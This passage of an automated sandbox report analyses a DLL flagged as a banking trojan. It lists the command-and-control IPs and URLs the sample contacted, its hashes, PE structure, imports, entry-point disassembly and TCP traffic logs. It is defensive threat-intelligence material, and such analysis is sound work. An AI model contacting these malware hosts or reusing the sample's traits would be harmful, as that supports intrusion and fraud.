https://45.77.0.96:6891/.0.96:6891/m	loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/0	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/a	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false		unknown
https://192.46.210.220/k	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/der6	loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/e	loaddll32.exe, 00000000.00000002.689702912.0000000000958000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/6	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/der.	loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/Microsoft	loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://14.77.0.96:6891/	loaddll32.exe, 00000000.00000003.563593432.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.77.0.96	unknown	United States	20473	AS-CHOOPAUS	true
185.56.219.47	unknown	Italy	202675	KELIWEBIT	true
192.46.210.220	unknown	United States	5501	FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe	true
143.244.140.214	unknown	United States	174	COGENT-174US	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510689
Start date:	28.10.2021
Start time:	05:09:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Variant.Razy.980776.8232.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.bank.troj.evad.winDLL@11/1@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.5% (good quality ratio 14.5%) Quality average: 78.9% Quality standard deviation: 16%
HCA Information:	Successful, ratio: 64% Number of executed functions: 21 Number of non-executed functions: 76
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 173.222.108.210, 173.222.108.226, 20.50.102.62, 80.67.82.235, 80.67.82.211, 52.251.79.25, 40.112.88.60, 20.54.110.249 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:11:10	API Interceptor	25x Sleep call for process: rundll32.exe modified
05:11:13	API Interceptor	36x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
45.77.0.96	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.20807.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.27063.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.2260.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.12452.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.6851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.2379.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.10617.dll	Get hash	malicious	Browse
185.56.219.47	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.20807.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.27063.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.2260.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.12452.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.6851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.2379.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.10617.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
KELIWEBIT	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.20807.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.27063.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.2260.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.12452.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.6851.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.2379.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.10617.dll	Get hash	malicious	Browse	185.56.219.47
AS-CHOOPAUS	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.20807.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.27063.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.2260.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.12452.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.6851.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.2379.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.10617.dll	Get hash	malicious	Browse	45.77.0.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.20807.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.27063.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.2260.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.12452.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.6851.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.2379.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.10617.dll	Get hash	malicious	Browse	192.46.210.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.4145988351536807
Encrypted:	false
SSDEEP:	6:kKP148EMl/s8gFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:XqW/Y2kPlE99SNxAhUefit
MD5:	C824601B37315775244B5F3E184E9784
SHA1:	BE13B9570195223FB1905895CA1B5F9056176976
SHA-256:	F1E30158F2A271948414554A5A7EAB87E175607772C6850C875084DDDBF130BF
SHA-512:	BA4E3BD1F6697124F2706659144894B7CB9DF7CF66B8DED8BDDE4A59EE453FF21DAB20A1751B90A800A011EB4C74C8E9CFC412ACA17585E3091789A3595253C6
Malicious:	false
Reputation:	low
Preview:	p...... ..........+9....(...............................................5....... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.439735798494042
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Razy.980776.8232.dll
File size:	1375232
MD5:	6df0687582c592e9860683a68858e082
SHA1:	53780def0699c055381746ce4ecebef8f17fd12d
SHA256:	90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
SHA512:	43c27e2af87306bd6389af980e50dffc2b219868881db1a026d56eef7b012f94d11426cf82338901c7e950b463e1e7a8e8f0f7563040a3b5c013b4a39906a376
SSDEEP:	24576:anxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7i:acfk82uAJTI7EPswKwuG
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:...~...~...~.....8.z...w.X._...,...z...,...l...,...c...,...[.....<.f...~.......,.......,.......,.3.....,.......Rich~..........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x4336b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5BBD73BC [Wed Oct 10 03:36:28 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ccbe70d6d0d02f6248ca160d6a0bb85b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F7AACA7D5A7h
call 00007F7AACA7E2D7h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F7AACA7D396h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
push edx
mov edx, dword ptr [ebp+08h]
xor edx, dword ptr [0054806Ch]
push edx
call 00007F7AACA7D5E4h
add esp, 08h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
mov eax, 00000020h
sub eax, edx
push eax
mov ecx, dword ptr [ebp+08h]
push ecx
call 00007F7AACA7D5B3h
add esp, 08h
xor eax, dword ptr [0054806Ch]
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
ror eax, cl
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
call 00007F7AACA7E93Dh
push eax
call 00007F7AACABF647h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [ebp+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x147190	0x6c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1471fc	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15c000	0x72b4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x143110	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x143168	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc7000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc5e2f	0xc6000	False	0.442065922901	data	6.47813133498	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xc7000	0x80aec	0x80c00	False	0.534103837985	data	5.52051601648	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x148000	0x13ba0	0x1800	False	0.1875	DOS executable (block device driverpyright)	3.99635070896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x15c000	0x72b4	0x7400	False	0.710264008621	data	6.69742088731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

Exports

Name	Ordinal	Address
Bluewing	1	0x49eed0
Earth	2	0x49efd0
Masterjust	3	0x49eb20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2021 05:11:08.698909044 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:08.698950052 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:08.699048996 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:08.718422890 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:08.718451977 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:09.246706963 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:09.246882915 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:09.564222097 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:09.564249039 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:09.564537048 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:09.564613104 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:09.567332029 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:09.567442894 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:09.567465067 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:10.279196024 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:10.279268026 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:10.279346943 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:10.279375076 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:10.439702988 CEST	49743	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:10.439732075 CEST	443	49743	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:11.096823931 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:11.096880913 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:11.096975088 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:11.114569902 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:11.114626884 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:11.630311966 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:11.630512953 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:11.930865049 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:12.091433048 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:12.091649055 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:12.102783918 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:12.120419979 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:12.120451927 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:12.120724916 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:12.120793104 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:12.123989105 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:12.124080896 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:12.124109983 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:12.263181925 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:12.264723063 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:12.264904976 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:12.834827900 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:12.834897995 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:12.835005045 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:12.835066080 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:13.916373014 CEST	49744	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:13.916407108 CEST	443	49744	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:14.434396029 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:14.594832897 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.595158100 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.595237017 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:14.596010923 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:14.596127987 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:14.756262064 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.756284952 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.756293058 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.756303072 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.756310940 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:14.971281052 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.129270077 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.129395962 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.130306959 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.139209032 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.139230013 CEST	808	49745	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:15.139326096 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.139367104 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.145967007 CEST	49745	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:15.288026094 CEST	808	49747	143.244.140.214	192.168.2.3
